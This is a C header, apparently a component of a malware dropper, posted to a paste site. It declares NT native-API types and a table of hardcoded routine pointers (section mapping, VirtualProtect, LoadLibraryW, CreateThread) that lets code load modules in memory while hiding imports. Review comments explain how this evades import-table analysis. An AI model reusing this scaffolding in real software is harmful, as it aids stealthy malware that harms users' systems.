FlyFar

dropper_AssemblyBlock2.h

Feb 19th, 2023
  1. #ifndef __ASSEMBLY_BLOCK2_H__
  2. #define __ASSEMBLY_BLOCK2_H__
  3.  
  4. #include "StdAfx.h"
  5.  
/*
 * Counted UTF-16 string as used by the NT native API.
 *
 * Same member order and types as the UNICODE_STRING in winternl.h.  The
 * layout is part of the contract with the native routines prototyped
 * below (it is reached via OBJECT_ATTRIBUTES.ObjectName), so do not
 * reorder or widen the members.  In the documented NT definition the two
 * counts are byte counts, not character counts.
 */
typedef struct _UNICODE_STRING {
        USHORT Length;        /* bytes in use in Buffer */
        USHORT MaximumLength; /* bytes available in Buffer */
        PWSTR  Buffer;        /* need not be NUL-terminated in the NT definition */
} UNICODE_STRING, *PUNICODE_STRING;
  11.  
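/*
 * Object attribute block taken by the ZwCreateSection prototype below.
 *
 * Member order and types must match the OBJECT_ATTRIBUTES definition in
 * winternl.h, because the structure is passed to the native API by
 * pointer; do not reorder.
 */
typedef struct _OBJECT_ATTRIBUTES {
        ULONG Length;                  /* callers normally set sizeof(OBJECT_ATTRIBUTES) */
        HANDLE RootDirectory;
        UNICODE_STRING *ObjectName;
        ULONG Attributes;
        PVOID SecurityDescriptor;
        PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
/*
 * POBJECT_ATTRIBUTES is a typedef, spelled like PUNICODE_STRING above and
 * like winternl.h, instead of "#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*".
 * A macro that expands to a pointer type does not distribute over a
 * declarator list: "POBJECT_ATTRIBUTES a, b;" used to declare one pointer
 * and one struct.  The only visible difference is that a hypothetical
 * "const POBJECT_ATTRIBUTES p" now means a const pointer rather than a
 * pointer to const; no such use appears in this header.
 */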
  22.  
/*
 * Inheritance disposition passed to the ZwMapViewOfSection prototype
 * below.  The values are fixed by the native API contract: in the
 * documented definition ViewShare means child processes inherit the view
 * and ViewUnmap means they do not.
 */
typedef enum _SECTION_INHERIT {
    ViewShare = 1,  /* inherit */
    ViewUnmap = 2   /* do not inherit */
} SECTION_INHERIT;
  28.  
/*
 * Pointer-to-function types, one per routine held in HARDCODED_ADDRESSES
 * below.  Each name is the routine's name with a "_t" prefix, and each
 * parameter list is copied from the public prototype.  WINAPI is kept on
 * every type so that the routine's calling convention is preserved when
 * it is invoked through the pointer.
 *
 * NOTE(review): file-scope identifiers that begin with an underscore are
 * reserved by C11 7.1.3.  The names are kept because HARDCODED_ADDRESSES
 * and presumably other translation units refer to them.
 */

/* Win32 routines. */
typedef int      (WINAPI *_tlstrcmpiW)(LPCWSTR, LPCWSTR);
typedef SIZE_T   (WINAPI *_tVirtualQuery)(LPCVOID, PMEMORY_BASIC_INFORMATION, SIZE_T);
typedef BOOL     (WINAPI *_tVirtualProtect)(LPVOID, SIZE_T, DWORD, PDWORD);
typedef FARPROC  (WINAPI *_tGetProcAddress)(HMODULE, LPCSTR);
typedef LPVOID   (WINAPI *_tMapViewOfFile)(HANDLE, DWORD, DWORD, DWORD, SIZE_T);
typedef BOOL     (WINAPI *_tUnmapViewOfFile)(LPCVOID);
typedef BOOL     (WINAPI *_tFlushInstructionCache)(HANDLE, LPCVOID, SIZE_T);
typedef HMODULE  (WINAPI *_tLoadLibraryW)(LPCWSTR);
typedef BOOL     (WINAPI *_tFreeLibrary)(HMODULE);
typedef HANDLE   (WINAPI *_tCreateThread)(LPSECURITY_ATTRIBUTES, SIZE_T, LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
typedef DWORD    (WINAPI *_tWaitForSingleObject)(HANDLE, DWORD);
typedef BOOL     (WINAPI *_tGetExitCodeThread)(HANDLE, LPDWORD);

/* Native (Zw*) routines; these return NTSTATUS rather than BOOL, so a
 * caller must test with NT_SUCCESS()-style logic, not "!= 0". */
typedef NTSTATUS (WINAPI *_tZwCreateSection)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG, HANDLE);
typedef NTSTATUS (WINAPI *_tZwMapViewOfSection)(HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T, SECTION_INHERIT, ULONG, ULONG);
typedef NTSTATUS (WINAPI *_tZwClose)(HANDLE);
  44.  
/*
 * Table of module handles and routine pointers through which the code
 * reaches the Win32 and native routines typedef'd above, instead of
 * through ordinary imports.
 *
 * Every member is const, so no C code that includes this header can
 * assign them once the object exists; the "HARDCODED" name and the
 * __ASM_REF_* prototypes below suggest the table is filled in elsewhere,
 * but this header does not show how or when -- confirm before assuming
 * any member is non-NULL.  Member order fixes the in-memory layout; do
 * not reorder or insert members.
 *
 * NOTE(review): routines reached through this table will not appear as
 * import entries of the image, so analysis keyed on the import table
 * should also inspect the contents of this object.
 */
typedef struct _HARDCODED_ADDRESSES {
    const HMODULE NTDLL_DLL;   /* presumably the ntdll module handle -- not shown here */
    const HMODULE EMPTY_PTR;   /* purpose not visible in this header */

    /* One pointer per routine, in the same order as the typedefs above. */
    const _tlstrcmpiW             lstrcmpiW;
    const _tVirtualQuery          VirtualQuery;
    const _tVirtualProtect        VirtualProtect;
    const _tGetProcAddress        GetProcAddress;
    const _tMapViewOfFile         MapViewOfFile;
    const _tUnmapViewOfFile       UnmapViewOfFile;
    const _tFlushInstructionCache FlushInstructionCache;
    const _tLoadLibraryW          LoadLibraryW;
    const _tFreeLibrary           FreeLibrary;
    const _tZwCreateSection       ZwCreateSection;
    const _tZwMapViewOfSection    ZwMapViewOfSection;
    const _tCreateThread          CreateThread;
    const _tWaitForSingleObject   WaitForSingleObject;
    const _tGetExitCodeThread     GetExitCodeThread;
    const _tZwClose               ZwClose;
} HARDCODED_ADDRESSES, *PHARDCODED_ADDRESSES;
  65.  
/*
 * NOTE(review): this is a definition, not a declaration, placed in a
 * header.  Every translation unit that includes the header gets its own
 * tentative definition of g_hardAddrs; whether those merge into a single
 * object depends on the toolchain (GCC 10+ defaults to -fno-common and
 * reports duplicate symbols).  The usual form is
 * "extern HARDCODED_ADDRESSES g_hardAddrs;" here plus one definition in a
 * .c file; it is left as-is because no defining .c file is visible from
 * this header.  With static storage and no initializer every member
 * starts out zero (NULL), and the const members cannot be assigned in C.
 */
HARDCODED_ADDRESSES g_hardAddrs;
  67.  
/*
 * External routines with no definition in this header.  The "__ASM_REF"
 * naming suggests they are implemented in assembly elsewhere -- TODO
 * confirm where they are defined and what each one references; the
 * numbering starting at 3 implies __ASM_REF_1 and __ASM_REF_2 live in
 * another block header.
 *
 * NOTE(review): identifiers containing "__" are reserved for the
 * implementation (C11 7.1.3); they are kept because other translation
 * units are presumably linked against these exact names.
 */
void __ASM_REF_3(void);
void __ASM_REF_4(void);
void __ASM_REF_5(void);
void __ASM_REF_6(void);
void __ASM_REF_7(void);
  73.  
  74. #endif